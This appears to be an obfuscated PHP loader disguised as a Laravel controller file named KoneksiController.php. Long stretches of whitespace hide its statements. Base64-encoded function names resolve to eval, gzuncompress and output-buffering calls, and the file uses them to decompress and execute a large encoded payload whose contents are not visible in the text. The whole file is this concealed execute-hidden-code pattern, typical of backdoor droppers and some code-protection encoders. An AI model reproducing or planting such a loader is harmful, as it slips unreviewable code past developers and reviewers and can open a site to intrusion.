<?php 
        $__='printf';$_='Loading app/Http/Controllers/Helpers/KoneksiController.php';
        











































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































































































































































                                                                                                                                                                                                                     $________;
